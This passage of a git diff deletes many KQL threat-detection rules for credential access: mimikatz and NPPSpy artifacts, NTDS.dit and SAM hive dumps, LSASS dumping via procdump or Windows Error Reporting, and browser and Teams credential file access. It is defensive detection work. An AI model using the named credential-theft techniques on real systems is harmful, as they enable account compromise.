-// Description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
-// Tags: attack.credential_access, attack.t1558
-DeviceFileEvents
-| where FolderPath endswith ".kirbi" or FolderPath endswith "mimilsa.log"
\ No newline at end of file
diff --git a/Credential Access/NPPSpy_Hacktool_Usage.kql b/Credential Access/NPPSpy_Hacktool_Usage.kql
deleted file mode 100644
index 5b0bddd5..00000000
--- a/Credential Access/NPPSpy_Hacktool_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/29
-// Level: high
-// Description: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file
-// Tags: attack.credential_access
-DeviceFileEvents
-| where FolderPath endswith "\\NPPSpy.txt" or FolderPath endswith "\\NPPSpy.dll"
\ No newline at end of file
diff --git a/Credential Access/NTDS.DIT_Created.kql b/Credential Access/NTDS.DIT_Created.kql
deleted file mode 100644
index 09925740..00000000
--- a/Credential Access/NTDS.DIT_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: low
-// Description: Detects creation of a file named "ntds.dit" (Active Directory Database)
-// Tags: attack.credential_access, attack.t1003.003
-DeviceFileEvents
-| where FolderPath endswith "ntds.dit"
\ No newline at end of file
diff --git a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Parent_Process.kql b/Credential Access/NTDS.DIT_Creation_By_Uncommon_Parent_Process.kql
deleted file mode 100644
index e4c7f6cf..00000000
--- a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Parent_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/11
-// Level: high
-// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
-// Tags: attack.credential_access, attack.t1003.003
-DeviceFileEvents
-| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessParentFileName in~ ("cscript.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "powershell.exe", "pwsh.exe", "w3wp.exe", "wscript.exe")) or (InitiatingProcessParentFileName startswith "apache" or InitiatingProcessParentFileName startswith "tomcat" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith ""))
\ No newline at end of file
diff --git a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Process.kql b/Credential Access/NTDS.DIT_Creation_By_Uncommon_Process.kql
deleted file mode 100644
index 82bd459b..00000000
--- a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/11
-// Level: high
-// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
-// Tags: attack.credential_access, attack.t1003.002, attack.t1003.003
-DeviceFileEvents
-| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") or (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\"))
\ No newline at end of file
diff --git a/Credential Access/NTDS_Exfiltration_Filename_Patterns.kql b/Credential Access/NTDS_Exfiltration_Filename_Patterns.kql
deleted file mode 100644
index ab57a2e4..00000000
--- a/Credential Access/NTDS_Exfiltration_Filename_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/11
-// Level: high
-// Description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
-// Tags: attack.credential_access, attack.t1003.003
-DeviceFileEvents
-| where FolderPath endswith "\\All.cab" or FolderPath endswith ".ntds.cleartext"
\ No newline at end of file
diff --git a/Credential Access/New_Generic_Credentials_Added_Via_Cmdkey.EXE.kql b/Credential Access/New_Generic_Credentials_Added_Via_Cmdkey.EXE.kql
deleted file mode 100644
index 4a27d643..00000000
--- a/Credential Access/New_Generic_Credentials_Added_Via_Cmdkey.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/03
-// Level: medium
-// Description: Detects usage of "cmdkey.exe" to add generic credentials.
-As an example, this can be used before connecting to an RDP session via command line interface.
-
-// Tags: attack.credential_access, attack.t1003.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g") and (ProcessCommandLine contains " -p" or ProcessCommandLine contains " /p") and (ProcessCommandLine contains " -u" or ProcessCommandLine contains " /u") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe")
\ No newline at end of file
diff --git a/Credential Access/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql b/Credential Access/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql
deleted file mode 100644
index fb03775e..00000000
--- a/Credential Access/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kutepov Anton, oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture
-// Tags: attack.discovery, attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "trace" and ProcessCommandLine contains "start") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Credential Access/PUA_-_DIT_Snapshot_Viewer.kql b/Credential Access/PUA_-_DIT_Snapshot_Viewer.kql
deleted file mode 100644
index fc358165..00000000
--- a/Credential Access/PUA_-_DIT_Snapshot_Viewer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Furkan Caliskan (@caliskanfurkan_)
-// Date: 2020/07/04
-// Level: high
-// Description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where FolderPath endswith "\\ditsnap.exe" or ProcessCommandLine contains "ditsnap.exe"
\ No newline at end of file
diff --git a/Credential Access/PUA_-_Mouse_Lock_Execution.kql b/Credential Access/PUA_-_Mouse_Lock_Execution.kql
deleted file mode 100644
index cad3d884..00000000
--- a/Credential Access/PUA_-_Mouse_Lock_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Cian Heasley
-// Date: 2020/08/13
-// Level: medium
-// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
-// Tags: attack.credential_access, attack.collection, attack.t1056.002
-DeviceProcessEvents
-| where ProcessVersionInfoProductName contains "Mouse Lock" or ProcessVersionInfoCompanyName contains "Misc314" or ProcessCommandLine contains "Mouse Lock_"
\ No newline at end of file
diff --git a/Credential Access/PUA_-_WebBrowserPassView_Execution.kql b/Credential Access/PUA_-_WebBrowserPassView_Execution.kql
deleted file mode 100644
index 09a3fc49..00000000
--- a/Credential Access/PUA_-_WebBrowserPassView_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/20
-// Level: medium
-// Description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera
-// Tags: attack.credential_access, attack.t1555.003
-DeviceProcessEvents
-| where ProcessVersionInfoFileDescription =~ "Web Browser Password Viewer" or FolderPath endswith "\\WebBrowserPassView.exe"
\ No newline at end of file
diff --git a/Credential Access/Permission_Misconfiguration_Reconnaissance_Via_Findstr.EXE.kql b/Credential Access/Permission_Misconfiguration_Reconnaissance_Via_Findstr.EXE.kql
deleted file mode 100644
index 0d6a0ceb..00000000
--- a/Credential Access/Permission_Misconfiguration_Reconnaissance_Via_Findstr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/12
-// Level: medium
-// Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This is seen being used in combination with "icacls" to look for misconfigured files or folders permissions
-// Tags: attack.credential_access, attack.t1552.006
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\"Everyone\"" or ProcessCommandLine contains "'Everyone'" or ProcessCommandLine contains "\"BUILTIN\\\"" or ProcessCommandLine contains "'BUILTIN\\'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains "icacls " and ProcessCommandLine contains "findstr " and ProcessCommandLine contains "Everyone")
\ No newline at end of file
diff --git a/Credential Access/PktMon.EXE_Execution.kql b/Credential Access/PktMon.EXE_Execution.kql
deleted file mode 100644
index 6b203914..00000000
--- a/Credential Access/PktMon.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/17
-// Level: medium
-// Description: Detects execution of PktMon, a tool that captures network packets.
-// Tags: attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where FolderPath endswith "\\pktmon.exe" or ProcessVersionInfoOriginalFileName =~ "PktMon.exe"
\ No newline at end of file
diff --git a/Credential Access/Potential_Browser_Data_Stealing.kql b/Credential Access/Potential_Browser_Data_Stealing.kql
deleted file mode 100644
index e03af167..00000000
--- a/Credential Access/Potential_Browser_Data_Stealing.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: medium
-// Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
-Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
-Web browsers typically store the credentials in an encrypted format within a credential store.
-
-// Tags: attack.credential_access, attack.t1555.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") or (FolderPath endswith "\\xcopy.exe" or FolderPath endswith "\\robocopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("XCOPY.EXE", "robocopy.exe"))) and (ProcessCommandLine contains "\\Amigo\\User Data" or ProcessCommandLine contains "\\BraveSoftware\\Brave-Browser\\User Data" or ProcessCommandLine contains "\\CentBrowser\\User Data" or ProcessCommandLine contains "\\Chromium\\User Data" or ProcessCommandLine contains "\\CocCoc\\Browser\\User Data" or ProcessCommandLine contains "\\Comodo\\Dragon\\User Data" or ProcessCommandLine contains "\\Elements Browser\\User Data" or ProcessCommandLine contains "\\Epic Privacy Browser\\User Data" or ProcessCommandLine contains "\\Google\\Chrome Beta\\User Data" or ProcessCommandLine contains "\\Google\\Chrome SxS\\User Data" or ProcessCommandLine contains "\\Google\\Chrome\\User Data\\" or ProcessCommandLine contains "\\Kometa\\User Data" or ProcessCommandLine contains "\\Maxthon5\\Users" or ProcessCommandLine contains "\\Microsoft\\Edge\\User Data" or ProcessCommandLine contains "\\Mozilla\\Firefox\\Profiles" or ProcessCommandLine contains "\\Nichrome\\User Data" or 
ProcessCommandLine contains "\\Opera Software\\Opera GX Stable\\" or ProcessCommandLine contains "\\Opera Software\\Opera Neon\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera Stable\\" or ProcessCommandLine contains "\\Orbitum\\User Data" or ProcessCommandLine contains "\\QIP Surf\\User Data" or ProcessCommandLine contains "\\Sputnik\\User Data" or ProcessCommandLine contains "\\Torch\\User Data" or ProcessCommandLine contains "\\uCozMedia\\Uran\\User Data" or ProcessCommandLine contains "\\Vivaldi\\User Data")
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_CLI.kql b/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_CLI.kql
deleted file mode 100644
index 8c7d33c2..00000000
--- a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_CLI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/23
-// Level: high
-// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Services\\" and ProcessCommandLine contains "\\NetworkProvider"
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_REG.kql b/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_REG.kql
deleted file mode 100644
index e4ed3b9c..00000000
--- a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_REG.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/23
-// Level: medium
-// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
-// Tags: attack.credential_access, attack.t1003
-DeviceRegistryEvents
-| where (RegistryKey contains "\\System\\CurrentControlSet\\Services" and RegistryKey contains "\\NetworkProvider") and (not(((RegistryKey contains "\\System\\CurrentControlSet\\Services\\WebClient\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe")))
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Via_LSASS_Process_Clone.kql b/Credential Access/Potential_Credential_Dumping_Via_LSASS_Process_Clone.kql
deleted file mode 100644
index 374f0565..00000000
--- a/Credential Access/Potential_Credential_Dumping_Via_LSASS_Process_Clone.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Samir Bousseaden
-// Date: 2021/11/27
-// Level: critical
-// Description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
-// Tags: attack.credential_access, attack.t1003, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Windows\\System32\\lsass.exe" and InitiatingProcessFolderPath endswith "\\Windows\\System32\\lsass.exe"
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Via_LSASS_SilentProcessExit_Technique.kql b/Credential Access/Potential_Credential_Dumping_Via_LSASS_SilentProcessExit_Technique.kql
deleted file mode 100644
index 1e6f67d2..00000000
--- a/Credential Access/Potential_Credential_Dumping_Via_LSASS_SilentProcessExit_Technique.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/02/26
-// Level: critical
-// Description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
-// Tags: attack.credential_access, attack.t1003.001
-DeviceRegistryEvents
-| where RegistryKey contains "Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe"
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Via_WER.kql b/Credential Access/Potential_Credential_Dumping_Via_WER.kql
deleted file mode 100644
index 0e1eb68b..00000000
--- a/Credential Access/Potential_Credential_Dumping_Via_WER.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @pbssubhash , Nasreddine Bencherchali
-// Date: 2022/12/08
-// Level: high
-// Description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " -u -p " and ProcessCommandLine contains " -ip " and ProcessCommandLine contains " -s ") and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and (FolderPath endswith "\\Werfault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe"))
\ No newline at end of file
diff --git a/Credential Access/Potential_Data_Stealing_Via_Chromium_Headless_Debugging.kql b/Credential Access/Potential_Data_Stealing_Via_Chromium_Headless_Debugging.kql
deleted file mode 100644
index 10980eef..00000000
--- a/Credential Access/Potential_Data_Stealing_Via_Chromium_Headless_Debugging.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: high
-// Description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
-// Tags: attack.credential_access, attack.t1185
-DeviceProcessEvents
-| where ProcessCommandLine contains "--remote-debugging-" and ProcessCommandLine contains "--user-data-dir" and ProcessCommandLine contains "--headless"
\ No newline at end of file
diff --git a/Credential Access/Potential_LSASS_Process_Dump_Via_Procdump.kql b/Credential Access/Potential_LSASS_Process_Dump_Via_Procdump.kql
deleted file mode 100644
index 2d6086da..00000000
--- a/Credential Access/Potential_LSASS_Process_Dump_Via_Procdump.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/10/30
-// Level: high
-// Description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process.
-This way we are also able to catch cases in which the attacker has renamed the procdump executable.
-
-// Tags: attack.defense_evasion, attack.t1036, attack.credential_access, attack.t1003.001, car.2013-05-009
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma ") and ProcessCommandLine contains " ls"
\ No newline at end of file
diff --git a/Credential Access/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql b/Credential Access/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql
deleted file mode 100644
index a9505cd1..00000000
--- a/Credential Access/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump".
-Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
-An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-
-// Tags: attack.credential_access, attack.discovery, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i" and FolderPath endswith "\\tshark.exe") or FolderPath endswith "\\windump.exe"
\ No newline at end of file
diff --git a/Credential Access/Potential_Reconnaissance_For_Cached_Credentials_Via_Cmdkey.EXE.kql b/Credential Access/Potential_Reconnaissance_For_Cached_Credentials_Via_Cmdkey.EXE.kql
deleted file mode 100644
index 7fe3ec0c..00000000
--- a/Credential Access/Potential_Reconnaissance_For_Cached_Credentials_Via_Cmdkey.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/01/16
-// Level: high
-// Description: Detects usage of cmdkey to look for cached credentials on the system
-// Tags: attack.credential_access, attack.t1003.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -l" or ProcessCommandLine contains " /l") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe")
\ No newline at end of file
diff --git a/Credential Access/Potential_Remote_Credential_Dumping_Activity.kql b/Credential Access/Potential_Remote_Credential_Dumping_Activity.kql
deleted file mode 100644
index 961665a6..00000000
--- a/Credential Access/Potential_Remote_Credential_Dumping_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: SecurityAura
-// Date: 2022/11/16
-// Level: high
-// Description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
-// Tags: attack.credential_access, attack.t1003
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath matches regex "\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$"
\ No newline at end of file
diff --git a/Credential Access/Potential_SAM_Database_Dump.kql b/Credential Access/Potential_SAM_Database_Dump.kql
deleted file mode 100644
index e28af050..00000000
--- a/Credential Access/Potential_SAM_Database_Dump.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/11
-// Level: high
-// Description: Detects the creation of files that look like exports of the local SAM (Security Account Manager)
-// Tags: attack.credential_access, attack.t1003.002
-DeviceFileEvents
-| where (FolderPath endswith "\\Temp\\sam" or FolderPath endswith "\\sam.sav" or FolderPath endswith "\\Intel\\sam" or FolderPath endswith "\\sam.hive" or FolderPath endswith "\\Perflogs\\sam" or FolderPath endswith "\\ProgramData\\sam" or FolderPath endswith "\\Users\\Public\\sam" or FolderPath endswith "\\AppData\\Local\\sam" or FolderPath endswith "\\AppData\\Roaming\\sam" or FolderPath endswith "_ShadowSteal.zip" or FolderPath endswith "\\Documents\\SAM.export" or FolderPath endswith ":\\sam") or (FolderPath contains "\\hive_sam_" or FolderPath contains "\\sam.save" or FolderPath contains "\\sam.export" or FolderPath contains "\\~reg_sam.save" or FolderPath contains "\\sam_backup" or FolderPath contains "\\sam.bck" or FolderPath contains "\\sam.backup")
\ No newline at end of file
diff --git a/Credential Access/Potential_SPN_Enumeration_Via_Setspn.EXE.kql b/Credential Access/Potential_SPN_Enumeration_Via_Setspn.EXE.kql
deleted file mode 100644
index 7a9ae968..00000000
--- a/Credential Access/Potential_SPN_Enumeration_Via_Setspn.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, keepwatch
-// Date: 2018/11/14
-// Level: medium
-// Description: Detects service principal name (SPN) enumeration used for Kerberoasting
-// Tags: attack.credential_access, attack.t1558.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q ") and (FolderPath endswith "\\setspn.exe" or ProcessVersionInfoOriginalFileName =~ "setspn.exe" or (ProcessVersionInfoFileDescription contains "Query or reset the computer" and ProcessVersionInfoFileDescription contains "SPN attribute"))
\ No newline at end of file
diff --git a/Credential Access/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Credential Access/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Credential Access/Potential_Suspicious_Activity_Using_SeCEdit.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Credential Access/Potential_Windows_Defender_Tampering_Via_Wmic.EXE.kql b/Credential Access/Potential_Windows_Defender_Tampering_Via_Wmic.EXE.kql
deleted file mode 100644
index 7f64931f..00000000
--- a/Credential Access/Potential_Windows_Defender_Tampering_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/11
-// Level: high
-// Description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic
-// Tags: attack.credential_access, attack.t1546.008
-DeviceProcessEvents
-| where ProcessCommandLine contains "/Namespace:\\\\root\\Microsoft\\Windows\\Defender" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/Credential Access/Potentially_Suspicious_Command_Targeting_Teams_Sensitive_Files.kql b/Credential Access/Potentially_Suspicious_Command_Targeting_Teams_Sensitive_Files.kql
deleted file mode 100644
index b4845455..00000000
--- a/Credential Access/Potentially_Suspicious_Command_Targeting_Teams_Sensitive_Files.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: @SerkinValery
-// Date: 2022/09/16
-// Level: medium
-// Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.
-The database might contain authentication tokens and other sensitive information about the logged in accounts.
-
-// Tags: attack.credential_access, attack.t1528
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Microsoft\\Teams\\Cookies" or ProcessCommandLine contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(FolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/Credential Access/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql b/Credential Access/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql
deleted file mode 100644
index 5a9213f4..00000000
--- a/Credential Access/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
-This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
-
-// Tags: attack.credential_access, attack.discovery, attack.t1552
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-InstanceId 4624" or ProcessCommandLine contains "System[EventID=4624]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4624") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4624") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains "System[EventID=4778]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains "System[EventID=25]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25")) or (ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" or ProcessCommandLine contains "Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational" or ProcessCommandLine contains "Security")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" 
or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog "))
\ No newline at end of file
diff --git a/Credential Access/PowerShell_Get-Process_LSASS.kql b/Credential Access/PowerShell_Get-Process_LSASS.kql
deleted file mode 100644
index 6a75f82e..00000000
--- a/Credential Access/PowerShell_Get-Process_LSASS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/04/23
-// Level: high
-// Description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
-// Tags: attack.credential_access, attack.t1552.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "Get-Process lsas" or ProcessCommandLine contains "ps lsas" or ProcessCommandLine contains "gps lsas"
\ No newline at end of file
diff --git a/Credential Access/PowerShell_SAM_Copy.kql b/Credential Access/PowerShell_SAM_Copy.kql
deleted file mode 100644
index acf9a4b5..00000000
--- a/Credential Access/PowerShell_SAM_Copy.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/29
-// Level: high
-// Description: Detects suspicious PowerShell scripts accessing SAM hives
-// Tags: attack.credential_access, attack.t1003.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\HarddiskVolumeShadowCopy" and ProcessCommandLine contains "System32\\config\\sam") and (ProcessCommandLine contains "Copy-Item" or ProcessCommandLine contains "cp $_." or ProcessCommandLine contains "cpi $_." or ProcessCommandLine contains "copy $_." or ProcessCommandLine contains ".File]::Copy(")
\ No newline at end of file
diff --git a/Credential Access/Private_Keys_Reconnaissance_Via_CommandLine_Tools.kql b/Credential Access/Private_Keys_Reconnaissance_Via_CommandLine_Tools.kql
deleted file mode 100644
index 9feb4708..00000000
--- a/Credential Access/Private_Keys_Reconnaissance_Via_CommandLine_Tools.kql
